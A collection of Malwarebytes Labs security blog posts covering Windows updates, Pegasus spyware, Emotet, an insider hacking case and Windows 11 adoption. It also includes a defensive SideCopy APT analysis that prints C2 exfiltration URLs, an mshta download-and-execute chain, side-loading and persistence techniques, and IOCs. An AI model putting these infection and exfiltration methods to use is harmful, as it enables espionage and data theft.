IT NEWS

How to check for Windows updates and install them

Keeping Windows up to date is an important part of warding off malware, exploits, and other attacks. If you’re not running the latest version of your OS, it can give cybercriminals the leverage they need to compromise your system.

Unfortunately not all machines are running automatic updates by default, depending on your operating system. This used to primarily be a problem on older versions of Windows. With something like Windows 10, you can’t hold back the update tide forever. The best you can do is pause updates for up to 35 days, at which point the only way you can pause again is to install new updates.

Outside of the pause/repeat cycle, most folks would resort to registry edits for longer periods of going without an update. This isn’t recommended for most users. If you’re a regular home user, there’s probably not many specific edge-case reasons why you’d want to have updates switched off.

How to check your Windows update status

Your updates should in theory be running in the background.

If you want to check whether they are, type “Windows update” into the search bar from the Start menu, and click into the Updates section. There, you’ll find a wide range of options and information.

At the very top, you’ll see if you’re up to date or not along with the time the computer last checked. From here, you can also manually check for updates.

If there are additional updates soon to be coming down the pipeline, you’ll also be able to see what they are, along with some details about the update. You can download and install manually before the updates are grabbed automatically.

If your system isn’t compatible with Windows 11, there’ll be a big box letting you know, along with the option to grab the Microsoft PC Health Check App. This will explain in more detail why you may not be able to meet system requirements for Windows 11.

Check your Windows update settings

Underneath the Windows 11 status box is a selection of fine tuning options related to Windows updates. These are:

Pause updates for 7 days. The length of pause required can be altered to your liking in the advanced options (to a maximum of 35 days).

Change active hours. This is for letting Microsoft know which time is best for updates, downloads, and so on. Many folks leave their PCs on overnight, so having all the update heavy lifting take place while asleep is ideal for them. Will you be out during the day? No problem, maybe daytime updates would fit your routine better.

View update history. This can be useful for troubleshooting or just keeping up to date with what’s been going on. Maybe a specific update went AWOL somehow. This is where you’d likely begin your search.

Advanced options. This is where you can alter the pause length for updates. You can also tell the device to receive updates for other Microsoft products when you update Windows. There are additional options for downloading over metered connections, restarting the device “as soon as possible” when a restart is required to install an update, and also various rules for on-screen notifications.

Is Windows update free?

Absolutely, and we recommend you make full use of its capabilities. Your devices will be that little bit more secure with regular automatic updates enabled.

The post How to check for Windows updates and install them appeared first on Malwarebytes Labs.

A week in security (Nov 29 – Dec 5)

Last week on Malwarebytes Labs:

Stay safe!

The post A week in security (Nov 29 – Dec 5) appeared first on Malwarebytes Labs.

NSO Group spyware found on iPhones of US State Department employees

iPhones of at least nine US State Department employees are said to have been hacked using the Pegasus spyware developed by the Israeli technology company, NSO Group. Pegasus is a proprietary and sophisticated spyware capable of the remote surveillance of smartphones.

The employees targeted by an unknown group using the spyware are either “based in Uganda or focused on matters concerning the East African country,” according to Reuters. The hack, which took place a few months back, is said to be the widest known hack of US officials through NSO technology.

Among those notified by Apple for being targeted by the NSO Group spyware is Norbert Mao, president of Uganda’s Democratic party. He tweeted:

The iPhones were infected using a graphics processing vulnerability that Apple only learned about and patched in September this year. The flaw is said to have been taken advantaged of since at least February.

In an interview with CNN, University of Toronto’s Citizen Lab’s John Scott-Railton, who investigated Pegasus, urged the US Bureau of Diplomatic Security to do more to protect State Department devices. “NSO has been a plain-sight national security threat for years, and the fact that these breaches happened and Apple is required to do the notification, shows that the threat was not being taken seriously enough,” Scott-Railton told the news outfit.

NSO Group controversy

Last month, the US Commerce Department blacklisted NSO Group, accusing it of providing spyware to foreign governments who then used the tools “to maliciously target journalists, embassy workers, and activists.” The blacklisting makes doing business with NSO Group more difficult for US companies.

Weeks after, Apple filed a lawsuit against NSO Group for breaking into its iOS platform to target US citizens.

And then last week, 86 human rights groups and experts issued a joint letter to European states, asking them to sanction NSO Group based on credible reporting that the Pegasus spyware has aided governments in abusing human rights.

According to a senior official of the Biden administration, the government is cracking down on companies like NSO Group to protect its citizens stationed in foreign countries and “pursue new global discussion about spying limits”. Sen. Ron Wyden, who is a member of the Senate Intelligence Committee, is quoted as saying: “Companies that enable their customers to hack US government employees are a threat to America’s national security and should be treated as such.”

Denial

NSO Group released a statement on Thursday denying that its tools were used in this hacking incident, and said it was happy to cooperate with relevant government authorities.

“If our investigation shall show these actions indeed happened with NSO’s tools, such customer will be terminated permanently and legal actions will take place.”

The post NSO Group spyware found on iPhones of US State Department employees appeared first on Malwarebytes Labs.

Why Macs are the best, according to Mac expert Thomas Reed: Lock and Code S02E23

In the year 2021, the war for computer superiority has a clear winner, and it is the Macintosh, by Apple. The company’s Pro model laptops are finally, belatedly equipped with ports that have been standard in other computers for years. The company’s beleaguered “butterfly” keyboard has seemingly been erased from history. And the base model of company’s powerhouse desktop tower could set you back a hefty $6,000.

What’s not to love?

Ribbing aside, according to our resident Mac expert at Malwarebytes, Thomas Reed, Apple has made several important decisions about device design in the past few decades to make them more secure, easier to use, and harder to tamper. And that’s a boon to users because, as Malwarebytes discovered just a couple of years ago, the threats to Mac machines increased by 400 percent from the year prior. But threats to Apple devices extend beyond laptop and desktop threats—for years, small companies have been finding vulnerabilities in Apple’s iOS mobile operating system and selling them to the highest bidders.

So, what defenses do Apple users have to prevent the increasing number of threats from impacting them directly? As Reed explained in this week’s Lock and Code episode with host David Ruiz, there’s a lot. Apple keeps bad users out, prevents clueless users from messing things up, and it works somewhat diligently to catch malware when it’s first reported on.

But not everything is as good as it should be, Reed said. In particular, Apple’s ideology about product secrecy has bled into its approach to security updates, meaning that the company has failed to provide transparent, timely communication to its users when it matters most.

“I can understand the secrecy when it comes to new products and new designs. But when it comes to security, communication is really important and Apple could really learn something from Microsoft.”

Thomas Reed, director of Mac and Mobile at Malwarebytes

Tune in to the latest episode of Lock and Code to learn about Mac security successes and failures, and about Mac history and Reed’s first experience with a computer mouse, along with a story about, reportedly, the first-ever ransomware attack in history.

This video cannot be displayed because your Functional Cookies are currently disabled.

To enable them, please visit our privacy policy and search for the Cookies section. Select “Click Here” to open the Privacy Preference Center and select “Functional Cookies” in the menu. You can switch the tab back to “Active” or disable by moving the tab to “Inactive.” Click “Save Settings.”

You can also find us on Apple PodcastsSpotify, and Google Podcasts, plus whatever preferred podcast platform you use.

The post Why Macs are the best, according to Mac expert Thomas Reed: Lock and Code S02E23 appeared first on Malwarebytes Labs.

Emotet’s back and it isn’t wasting any time

Emotet is one of the best known, and most dangerous, malware threats of the past several years.

On several occasions it appeared to take an early retirement, but it has always came back. In January of this year, a global police operation dismantled Emotet’s botnet. Law enforcement then used their control of this infrastructure to send a “self-destruct” update to Emotet executables. Infected organizations were given a few months grace to clean up the the neutered malware before the remaining copies did as they’d been instructed and ate themselves in April.

However, that wasn’t the end of the story.

Last month we reported on how another notorious bit of malware, TrickBot, was helping Emotet come back from the dead. And then yesterday, several security researchers saw another huge spike in Emotet’s activity.

Blinking light

The presence of Emotet in the threat landscape has had the appearance of a blinking red light for years. Emotet started out in 2014 as an information-stealing banking Trojan that scoured sensitive financial information from infected systems (which is why Malwarebytes detects some components as Spyware.Emotet). Over the years, it evolved into a global-scale distribution infrastructure for other malware.

During this time we have seen Emotet disappear and show up again on several occasions. In September 2019, Emotet emerged from a four month hiatus with a new spam campaign, before going back into hiding early in 2020 and reappearing in July of the same year. Its use then declined, with occasional spikes, before it returned just in time for Christmas and was then dealt a massive blow by collective law enforcement action in January this year.

Recent spikes

On the December 1, 2021, our Threat Intelligence team noted a huge spike in Emotet C2 activity.

C2 activity
C2 activity observed by Malwarebytes

Other researchers also noted spikes in the number of URLs being used to distribute the malware, and the number of malware samples.

From all the reports and alerts by researchers and analysts we can see a few interesting trends.

  • First of all, our own research shows the global distribution of Emotet has a clear focus on the US.
Global coverage Emotet campaign

Speculation

From this point on the content of this post is speculation, so feel free to skip it if you have developed your own theories. Or feel free to compare notes and leave your remarks in the comments.

Emotet is growing a lot faster than any newcomer to the scene could do. This seems to indicate that old relationships have been renewed, which usually means that the persons that tied these knots in the past are still working on the project and bringing “old friends” back in.

Given the global distribution and the different campaigns that are ongoing it’s likely there are several different affiliates at work. And looking at their methods we can tell that these are not some “fresh out of their mother’s basement script kiddies” either. They are using sophisticated methods and abusing vulnerabilities that haven’t been patched yet by quite a lot of organizations. For example, some Microsoft Exchange vulnerabilities will allow them to hijack existing email threads, which gives the spam messages a higher credibility.

I checked the hosting companies for the WordPress sites, expecting to find a lot of GoDaddy domains that might have been compromised while their credentials were for sale. But I found a lot of different hosting companies, which makes WordPress the common denominator. It’s likely therefore that the attackers are exploiting vulnerable versions of WordPress plugins like OptinMonster, WP Fastest Cache, and WooCommerce Dynamic Pricing and Discounts, all of which were recently patched. (Although there are probably others that we do not know about yet too.)

Hard fact

Emotet is back! For how long is hard to predict, but they don’t behave as if they have any plans to retire again soon.

Stay safe, everyone!

The post Emotet’s back and it isn’t wasting any time appeared first on Malwarebytes Labs.

Attacker unmasked by VPN flubs charged with Ubiquiti hack

A veritable barn-stormer of an insider threat story has recently come to light.

A former employee of Ubiquiti Networks, Nickolas Sharp, has been arrested and charged for allegedly hacking company servers, stealing gigabytes of information, and then rounding it all off with a splash of extortion. This took place in December of last year, but there’s no clear reason (yet) for why he did any of it.

The alleged perpetrator might have gotten away with it too, but for several disastrous choices which ultimately led to their downfall.

Covering his tracks

Sharp clearly put some thought into the attack. Many people would perhaps just blunder across the network, leaving large but unintentional “It was me” footprints all over the place. Not so here… he made use of his network access to alter logs and more, throwing a blanket over what was actually taking place. Cleverly, he used a VPN to hide his details while doing this.

He probably thought he’d gotten away with it. However, breaches do get discovered eventually. The clock was ticking. The question was: Had he done enough?

The answer was no, he hadn’t.

Finding himself on the incident response team investigating his own attack(!), he’s alleged to have threatened to release data stolen from his employer if a ransom demand for 50 bitcoin (roughly $2 million when this all took place) wasn’t paid. According to the US Department of Justice, he then released some of the files when the ransom wasn’t forthcoming. None of this is really conducive to keeping a low profile, and the wheels started to come off.

Anonymous—up to a point

If you’re up to no good and relying on anonymity to protect you, even the slightest connection to your real life can bring the whole scheme crashing down.

Sharp’s attempts to avoid detection apparently rested with his use of a VPN. This, in theory, would keep his real IP address hidden. Law enforcement had other ideas, working out a connection between the VPN account used to attack Ubiquit and one used to create Sharp’s PayPal account.

The real kicker is that when his home internet briefly went down, so too did the VPN, and his real IP showed up as connecting to the previously mentioned workplace Github account.

From bad, to worse, to even worse than that

A visit from law enforcement might deter most people from further antics. If it were me, I’d cut my losses and keep a very low profile. However, this story was made for further antics. The Department of Justice claims the alleged perpetrator posed as a company whistleblower after the FBI had searched his home. This “whistleblower” routine took the form of stories potentially damaging to the Ubiquiti Networks organisation.

This is, frankly, an astonishing chain of events. Especially considering this hack had such a big impact on stock. It remains to be seen what, exactly, would drive someone to this sort of self-destructive cavalcade of disaster. For now, you’ll have to make do with the indictment (PDF).

When insiders attack

We’ve talked about the harms caused by insider threats many times on this blog. Problems can arise from disgruntled employees who’ve gone past the point of no return with scores to settle. Ex-employees who didn’t have their access to systems revoked can be a problem. Even the humble printer can become a battleground for keeping certain types of special paper out of easy reach. Even the FBI aren’t safe from such events.

It’s not possible to eliminate this issue completely, unfortunately. On the bright side, we can see that even in a case as severe as the Ubiquiti attack, the long arm of the law can catch up with criminals eventually—no matter how well prepared they think they are.

The post Attacker unmasked by VPN flubs charged with Ubiquiti hack appeared first on Malwarebytes Labs.

SideCopy APT: Connecting lures to victims, payloads to infrastructure

This blog post was authored by Hossein Jazi and the Threat Intelligence Team.

Last week, Facebook announced that back in August it had taken action against a Pakistani APT group known as SideCopy. Facebook describes how the threat actors used romantic lures to compromise targets in Afghanistan.

In this blog post we are providing additional details about SideCopy that have not been published before. We were able to have unique insights about victims and targeted countries as well as the kind of data the APT group was able to successfully exfiltrate. Among the information that was stolen is access to government portals, Facebook, Twitter and Google credentials, banking information, and password-protected documents.

In addition, we detail how this threat actor had started to use new initial infection vectors for its operations which include Microsoft Publisher documents and Trojanized applications. Finally, we detail a newly-observed stealer that has been used by this actor called AuTo stealer.

Newly observed lures

The SideCopy APT is a Pakistani threat actor that has been operating since at least 2019, mainly targeting South Asian countries and more specifically India and Afghanistan. Its name comes from its infection chain that tries to mimic that of the SideWinder APT. It has been reported that this actor has similarities with Transparent Tribe (APT36) and possibly is a subdivision of this actor. Cisco Talos and Seqrite have provided comprehensive reports on this actor’s activities.

The lures used by SideCopy APT are usually archive files that have embedded one of these files: Lnk, Microsoft Publisher or Trojanized Applications. These lures can be categorized into two main groups:

  • Targeted lures: These lures are specially crafted and designed to target specific victims. We believe this category is very well customized to target government or military officials. Here some of the examples:
    • Report-to-NSA-Mohib-Meeting-with-FR-GE-UK.zip:
      This archive file contains a Microsoft Publisher document that is a letter from “Mr Ahmad Shuja Jamal, former DG for International Relations and Regional Cooperation at the National Security Council of Afghanistan” to “Hamdullah Mohib, former National Security Adviser of Afghanistan”. This letter is about a “meeting with representatives of France and UK delegations of Afghanistan”. Most likely this lure has been used to target Afghanistan government officials and especially foreign affair related officials.
    • address-list-ere-update-sep-2021.zip: This archive file contains a malicious lnk file which loads a decoy PDF file. The decoy PDF file is: “Email facility address list of the ERE units: 20 Sept 2021”. This lure seems to be used to target the Indian Army and National Cadet Corps of India.
    • NCERT-NCF-LTV-Vislzr-2022.zip: Similar to the previous one, this includes a malicious lnk that loads a decoy PDF file. The decoy is a curriculum of the course named “Living the values, a value-narrative to grass-root leadership” offered by NCERT (National Council of Educational Research and Training of India).
fig1
Figure 1: NSA meeting lure
fig2
Figure 2: Email facility address list of the ERE units: 20 Sept 2021
fig3
Figure 3: Living the values course
  • Generic lures: These lures are mostly generic and most likely have been used in spam campaigns to collect emails and credentials to help the actor perform their targeted attacks. In this category we observed the following: (The first three lures are the ones reported as “romantic lures” in a Facebook report)
    • Using girl names as the archive file name such as “nisha.zip“: (showing girl pictures with an application) These archive files contain a list of images with the “.3d” extension and an application named “3Dviewer.exe” that needs to to be executed to load and view images. In fact, the executable is Trojanized and will contact the actor servers to download the malicious payloads.
    • image-random number.zip“: These zip files contains a malicious lnk file that shows a girl picture as a decoy.
    • Whatsapp-image-random number.zip“: These zip files contain a malicious lnk file that shows a girl picture as a decoy.
    • schengen_visa_application_form_english.zip“: This archive file contains a Microsoft Publisher document that loads a Schengen Visa Application Form in English as decoy. This is used to target people who want to travel to European countries.
    • Download-Maria-Gul-CV.zip“: This archive contains a lnk that loads a resume as decoy. The name of the archive file usually is in this pattern “Download-Name-FamilyName-CV.zip”
    • New document.zip“: This loads a document as decoy. We were not able to retrieve the lure in this case.
fig4
Figure 4: Schengen Visa Application Form
Figure 5: 3DViewer.exe

Victimology

As previously reported, the SideCopy APT has mainly targeted defense and armed forces personnel in the Indian subcontinent but there are not many reports about how successful these attacks were and what data was exfiltrated. The Malwarebytes Threat Intelligence team was able to identify some of the successful attacks operated by this APT. It is worth noting that those compromises happened before the Taliban completely took over Afghanistan. In fact, Facebook’s intervention in August matches with the timeline of indicators we recorded.

  • Administration Office of the President (AOP) of Afghanistan personnel: This actor has operated targeted spear phishing attacks on members of AOP and was able to gain access to ten of them and steal their credentials from different government services such as mis.aop.gov.af, internal service, bank services (Maiwand Bank) and personal accounts such as Google, Twitter and Facebook.
  • Ministry of Foreign affairs- Afghanistan: We have evidence that the actor infected one of the members of the Ministry of External affairs but it seems they were not able to collect any data from this victim.
  • Ministry of Finance, Afghanistan: The actor infected two members of MOF but mostly they were able to collect personal accounts such as Google and Facebook and Bank accounts (“worldbankgroup.csod.com”). They also exfiltrated documents that are password protected.
  • Afghanistan’s National Procurement Authority (NPA): The actor infected one person in NPA and were able to stead personal credentials including Twitter, Facebook, Instagram, Pinterest, Google and the mis.aop.gov.af account.
  • A shared computer, India: It seems the actor gained access to a shared machine and collected a lot of credentials from government and eduction services. It seems this machine has been infected using one of the generic lures.

The SideCopy APT was able to steal several Office documents and databases associated with the Government of Afghanistan. As an example, the threat actor exfiltrated Diplomatic Visa and Diplomatic ID cards from the Ministry of Foreign Affairs of Afghanistan database, as well as the Asset Registration and Verification Authority database belonging to the General Director of Administrative Affairs of Government of Afghanistan. They also were able to exfiltrate the ID cards of several Afghani government officials.

fig6
Figure 6: Asset Registration and Verification Authority database belonging to the General Director of Administrative Affairs of Government of Afghanistan

The exfiltrated documents contain names, numbers and email addresses associated with government officials. It is possible that they have been already targeted by the actor or will be the future targets of this actor. There are also some confidential letters that we think the actor is planning to use for future lures.

Attacker infrastructure

We have uncovered the main command and control (C2) server used by the attacker to monitor and control their victims. Each archive file that is used by the attacker to send to victims is considered a unique package and each package has its own payloads including hta and executables that usually are hosted on compromised domains. The actor has a system named “Scout” to monitor each package. The Scout system has four users with English nicknames (Hendrick, Alexander, Hookes, Malone). It also defines teams that are responsible to manage each package.

fig8 scaled
Figure 7: Scout system

In this system, they have a dashboard that shows all the infected machines. Each row in the dashboard shows one package and its statistics which includes the IP address of the victim, package name, OS version, User-Agent, browser information, country and victim status.

fig9 2
Figure 8: Dashboard

The actor uses a different dashboard called Crusader to monitor the Action RAT statistics.

fig10 1
Figure 9: Crusader

Analysis of the new attacks

As we mentioned earlier, the actor has used three different methods as its initial infection vector: lnk files, Microsoft Publisher files and Trojanized application. The lnk files have been well studied and what we have observed is very similar to what already has been reported, with only small changes. For example, we observed that they have updated the code of hta.dll and preBotHta.dll and added some more features.

In this section we provide the analysis for the other two variants: Microsoft Publisher and Trojanized Applications.

Microsoft Office Publisher

In this variant, attackers have embedded a Microsoft Office Publisher document in an archive file. We’ve identified two variants of the Office publisher documents:

  • Report to NSA Mohib – Meeting with FR, GE, UK – 12 Nov 2020.docx.pub
  • schengen_visa_application_form_english.pub

Both of these documents were created in August 2021 and we believe they have been used in the most recent campaign. Both of these documents contains a simple macro that calls Shell function to call mshta.exe to download and execute a specified hta file.

fig11
Figure 10: Embedded macros

The hta file loads the loader DLL (PreBotHta.dll) into memory and then collects AV product names. The AV name along with the encoded payloads that need to be loaded by this loader are passed to the PinkAgain function.

fig12 scaled
Figure 11: HTA file

The loader is responsible for dropping both credwiz.exe and Duser.dll. Unlike what has been reported, in this case Duser.dll is not copied into different locations based on AV products and it is copied into C:ProgramDataShareIt for all AV products.

fig13 1 scaled
Figure 12: Loader dll

This loader just does some additional work based on the AV product. For example if the AV product is Avira it tries to download and execute an additional hta file to deploy additional payloads.

fig14
Figure 13: Additional payload execution based on the AV type

After dropping the required files onto the victim, it starts the “credwiz.exe” process. This executable sideloads the malicious payload “Duser.dll”. This payload has been written in Delphi (this is the Delphi variant of Action Rat) and compiled on October 2 2021.

All the commands, strings and domains in this RAT are base64 encoded. The malicious process starts by collecting hostname, username, OS version, OS architecture, Mac address and installed AV products (by executing cmd.exe WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Path AntiVirusProduct Get displayName /Format:List) from the victim and sending them to the command and control server using a HTTP request ("https://afrepublic.xyz/classification/classification.php").
It then goes into a loop and waits for commands from the server to execute them. This RAT has the capability to execute one of the following commands:

  • Command: Execute commands received from the server
  • Download: Download additional payloads
  • Drives: Get drive info
  • GetFiles: Get files info
  • Execute: Execute a specified payload using CreateProcessW
  • Upload: Upload files to server
fig15
Figure 14: Commands

After execution of each command it reports back the result to its server. The reporting url is different than the C2 url. The report type depends on the command, for example if the payload executes a command, it reports the following information to the server: Victim’s ID, the executed command, the command output and the error message if the command execution was not successful.

Trojanized Image Viewer Application (3DViewer.exe)

In this variant, the attacker has distributed an archive file including an application named 3Dviewer.exe and a set of images with “3d” extension that can be only opened by that executable.

It seems the attacker Trojanized an image viewer application named “3Dviewer” to download and execute a malicious HTA file using Mshta in addition to its normal function that can load and show the pictures. This executable has been compiled on October 26 2021. The rest of the process is similar to what we described in the previous section.

fig16 scaled
Figure 15: 3DViewer.exe

AuTo Stealer

We also came across another Stealer used by this actor that has been written in C++. To the best of our knowledge this is a new Stealer used by SideCopy APT. A Loader has been used to drop and load an executable (credbiz.exe) that side loads the Stealer. We were able to identify two different variants of this Loader that have been used to load an HTTP version and TCP version of the Stealer. Both of these loaders and the Stealer components have been compiled on October 30 2021:

Loader

Based on the functionality, we can say this Loader is a C++ variant of PreBotHta.dll (C# Loader used to load other Rats used by this actor). This Loader is responsible for dropping the following files in C:ProgramDataOracle directory:

  • credwiz.exe executable and rename it as credbiz.exe.
  • TextShaping.dll (Stealer component that will be side loaded by credbiz.exe)
fig17
Figure 16: Drop credbiz and TextShaping

Similar to PreBotHta.Dll, it checks the installed AV product on the victim’s machine and performs additional actions based on the AV product name. For example if the AV is Avast, Avira, BitDefender or AVG it creates a batch file (sysboot.bat) and executes it by calling cmd.exe. This makes credbiz.exe persistence through the AutoRun registry key. If the installed AV is one of the Kaspersky, Symantec, Mcafee or QuickHeal it creates an lnk file (Win Setting Loader.lnk) for persistency in StartUp directory.

After performing the additional process, it executes credbiz.exe by calling CreateProcessW.

fig18
Figure 17: Additional functionality based of AV product

TextShaping.dll (Stealer component)

The actor used two different variants of the Stealer Stealer: HTTP and TCP. The HTTP version performs the exfiltration over HTTP while the TCP variant performs all the exfiltration over TCP. This component also has an interesting unique PDB path: "D:Project AlphaHTTP AutoappReleaseapp.pdb"

This Stealer collects PowerPoint, Word, Excel and PDF documents, text files, database files and images and exfiltrates them to its server over HTTP or TCP. To exfiltrate the data using HTTP, it builds a request that is specific to data files being exfiltrated and sends them over an HTTP server. For example, when it wants to exfiltrate PowerPoint documents it builds the following request and sends them over HTTP:
http://newsroom247.xyz:8080/streamppt?HostName_UserName

fig19
Figure 18: Stealer

For other file types it adds the /stream related to the file type and exfiltrates them to server. Here are the list of them: /streamppt, /streamdoc, /streamxls, /streamdb, /streamtxt, /streampdf, /streamimg.

Before starting the stealing process, it collects the victim’s information including username, hostname, OS info and AV products and sends them to its server by adding “user_details” to the domain. Also, it collects file information from the victim’s machine and stores it in a file “Hostname_UserName.txt” and sends the file by using the “logs_receiver” command.

Conclusion

The SideCopy APT has been actively targeting government and military officials in South Asia. The group mainly uses archived files to target victims in spam or spear phishing campaigns. The archive files usually have an embedded lnk, Office or Trojanized application that are used to call mshta to download and execute an hta file. The hta files perform fileless payload execution to deploy one of the RATs associated with this actor such as AllaKore or Action Rat. Malwarebytes products can identify the initial infection vectors used by SideCopy and block them from execution.

sideblock

IOCs

Name IOC Type Description
Report-to-NSA-Mohib-Meeting-with-FR-GE-UK.zip 4E26CCAD3FC762EC869F7930A8457E4D MD5
schengen_visa_application_form_english.zip C2831369728B7247193E2DB567900ABE MD5
new document.zip 689B9FDBF35B8CEFC266A92D1D05A814 MD5
Image-8765.zip D52021F350C9C2F8EE87D3B9C070704A MD5
Image-8853.zip D99491117D3D96DA7D01597929BE6C8E MD5
479_1000.zip 7C0A49F3B4A012BADE8404A3BE353A48 MD5
Muniba.zip A65D3AB8618E7965B9AE4FAE558EB8F2 MD5
nisha.zip 48C165124E151AA2A1F4909E0B34E99C MD5
Whatsapp-Image-7569.zip 0023A30B3F91FA9989E0843BBEB67CC1 MD5
Download-Maria-Gul-CV.zip 5044027CCB27401B06515F0912EB534A MD5
DP_TCP.exe ec87ddad01869b58c4c0760a6a7d98f8 MD5 AuTo Stealer
DP_HTTP.exe e246728aa4679051ed20355ae862b7ef MD5 AuTo Stealer
 TextShaping.dll c598a8406e2b9ec599ab9e6ec4e7d7c2 MD5 AuTo Stealer
TextShaping.dll 5f49c816d7d2b6fa274041055cc88ba7 MD5 AuTo Stealer
Payloads

Domain/IP Description
afrepublic.xyz C2
newsroom247.xyz C2
afghannewsnetwork.com C2
maajankidevisevasansthan.org Host payloads
amsss.in Host payloads
scouttable.xyz C2
securedesk.one C2
eurekawatersolution.com Host payloads
republicofaf.xyz C2
securecheker.in Host payloads
appsstore.in C2
scout.fontsplugins.com C2
144.126.141.41 C2
C2s and Payloads Hosts

Mitre attack techniques

Tactic id Name Details
Phishing T1566.001 Spear phishing Attachment Distribute archive file as an spear phishing attachment
Execution T1047 Windows Management Instrumentation Uses WMIC.EXE to obtain a system information
Uses WMIC.EXE to obtain a list of AntiViruses
Execution T1059.003 Command and Scripting Interpreter: Windows Command Shell Starts CMD.EXE for commands execution
Execution T1204.001 User Execution: Malicious Link
Execution T1204.002 User Execution: Malicious File
persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Discovery T1012 Query Registry Reads the computer name
Discovery T1082 System information discovery
Discovery T1518.001 Software Discovery: Security Software Discovery Uses WMIC.EXE to obtain a list of AntiViruses
Defense Evasion T1218.005 Signed binary proxy execution: mshta Starts MSHTA.EXE for opening HTA or HTMLS files 
Defense Evasion T1140 Deobfuscate/Decode Files or Information Uses base64 decodes to decode C2s
Defense Evasion T1574.002 Hijack Execution Flow: DLL Side-Loading Uses credwiz.exe to side load its malicious payloads
Collection T1119 Automated Collection Collects db files, docs and pdfs automatically
Collection T1005 Data from Local System
Command and Control  T1071.001 Application Layer Protocol: Web Protocols
Command and Control  T1071.002 Application Layer Protocol: File Transfer Protocols
Exfiltration T1041 Exfiltration Over C2 Channel

The post SideCopy APT: Connecting lures to victims, payloads to infrastructure appeared first on Malwarebytes Labs.

Emotet being spread via malicious Windows App Installer packages

As reported by Cryptolaemus on Twitter, and demonstrated step by step by BleepingComputer, Emotet is now being distributed through malicious Windows App Installer packages that pretend to be Adobe PDF software.

How does the attack work?

To understand what Microsoft is supposed to do about this method, we need to look at how these attacks work. URLs are sent out to victims by using malspam. The emails are sent to appear as replies to existing conversations by using stolen reply-chain emails. In the email they ask the receiver to look at an attachment. Clicking the link brings the victim to a fake Google Drive page that prompts them to click a button to preview the PDF document.

If you use the “Preview PDF” button it triggers an ms-appinstaller URL that attempts to open a file with an  .appinstaller extension hosted on Microsoft Azure using URLs at *.web.core.windows.net. Appinstaller files mostly belong to App Installer by Microsoft. An .appinstaller file helps if you need multiple users to deploy your MSIX installation file. This is an XML file that you can create yourself or create, for example by using Visual Studio. The .appinstaller file specifies where your app is located and how to update it.

When attempting to open an .appinstaller file, the Windows browser will prompt if you wish to open the Windows App Installer program to proceed. In this case, once you agree, you will be shown an App Installer window prompting you to install the “Adobe PDF Component.” This malicious package looks like a legitimate Adobe application, as it has a legitimate Adobe PDF icon, a valid certificate which marks it as a ‘Trusted App’, and fake publisher information.

If a user chooses to proceed with the install—and why would they stop this far down the rabbit hole?—App Installer will download and install the malicious appxbundle hosted on Microsoft Azure. This bundle drops a .dll on the affected system and creates a startup entry for this .dll. This startup entry will automatically launch the DLL when a user logs into Windows. At that point you are infected with Emotet.

Hosting malicious files on Azure

Microsoft’s Azure cloud services have become an attractive option for cybercriminals to store malicious content. Not just for malicious files as in the case of Emotet, but also for phishing sites, other fraudulent sites, and command and control servers. Azure is certainly not alone, other content hosting sites like Google Drive, Dropbox, and Amazon’s web services are also abused to store malicious content. But critics are hard on Microsoft since it consider itself a security vendor. By the time of writing, the .appinstaller file was removed, but it was available for download longer than it should have been.

appinstaller removed
The URL for the .appinstaller returns a 404 error

While we understand how difficult it is to inspect everything that gets uploaded into your cloud service, and that you can’t study every new customer under a microscope, we also do not know how much time passed between the first report of this new Emotet distribution method and the actual takedown.

Microsoft is receiving flack because it is its cloud service hosting malware, its app installer is used in the process, and its Operating System (Windows) is the target of the attacks. Does that make it an enabler? Not really and certainly not voluntarily.

Emotet

While we all thought and hoped that Emotet had kicked the bucket, it made a dramatic comeback a few weeks ago. And using new distribution methods is a clear sign that it is serious about the comeback.

So, don’t click those links, even if the URL looks trustworthy, the file icon looks legit, and the file is signed. Check with the alleged sender about whether the message really comes from them and is intended for you.

Stay safe, everyone!

The post Emotet being spread via malicious Windows App Installer packages appeared first on Malwarebytes Labs.

Most people aren’t upgrading to Windows 11: Not the end of the world

Windows 11 is experiencing an apparent lack of uptake among Windows users. If this survey is accurate, less than 1% of 10 million PCs surveyed are running the new operating system. In fact, more machines are using Windows XP.

That may surprise you. It might even seem like a bit of an embarrassing failure for Microsoft. However, the low numbers could well be a very good thing overall. It was always going to be a slow uptake, and we’re going to look at some of the reasons why.

Low numbers are to be expected – and that’s fine

There are quite a few barriers to entry for anyone looking to upgrade to Windows 11. In fact, it’s not just businesses facing Windows headaches. It’s home users too, but perhaps for somewhat different reasons.

  1. Old apps: A big reason ancient operating systems like XP still run in organisations is down to old, business critical apps. For most businesses, no one size fits all solution exists. Some of the tech will be outsourced. Bits of it will operate remotely, rather than in house. There’ll be bespoke applications made by someone who left the organisation 5 years ago. Most folks won’t know how it operates, just how to patch it if something goes wrong. Pulling it out will break lots of business critical systems, and there’s no guarantee a replacement will work. Oh, and by the way: it only runs on Windows XP. That’s how you end up with XP and other old operating systems all over the place. They’ve carved their tiny niche, and almost nothing will dislodge them.
  2. Strict requirements and confusing messaging: This boils down to TPM, or Trusted Platform Module. Microsoft made this a requirement to install the newer operating system. It’s an additional security feature which helps keep bad people away from your data. Unfortunately, initial descriptions of TPM were somewhat confusing. The continued state of malaise over TPM is likely keeping folks away from Windows 11 for the time being. Even now, it’s tricky to find people who make business decisions on tech who are familiar with the issue, and have the required equipment to run Windows 11 the way it’s supposed to be run.
  3. Gaming headaches: Many home users have avoided Windows 11 because of the potential impact on gaming performance. People don’t generally want to spend thousands on gaming rigs, then find their expensive graphics card is suddenly underperforming. If they’re running mid-range or cheap cards, they’re probably even more likely to say no. There’s definitely an air of “wait and see” where this is concerned. Nobody wants to mess up their pre-loaded Windows 10 box with a failed 11 upgrade. Folks who built their machines from scratch will probably want to stay with Windows 10 for the time being too. It’s just too much of a leap in the dark at the moment.

These are the main points, but we can think of some more.

Windows 10: ageing like a fine wine

Do people actually need to suddenly jump into Windows 11? What’s the compelling reason for doing so? It seems very likely that for most people, there just isn’t one. Yet.

I often use Windows 10. I’m fine with it, after a few false starts at the beginning. The handful of alterations to core functionality and usability that I’ve heard about, aren’t things I’m particularly interested in. They’re not deal-breakers, but I just wonder “Why bother? This works fine.”

Does Microsoft want people to adopt quickly?

I think we forget that Windows 10 has already been around for 6 years. It’s not a new thing anymore! Microsoft is entirely happy to keep Windows 10 chugging along. Support for it won’t end until October 14, 2025. That’s four more years of Windows 10 action, and it’ll still be used for some time after that. By that point, some of the more peculiar quirks will have been ironed out. Businesses will have a better feel for it.

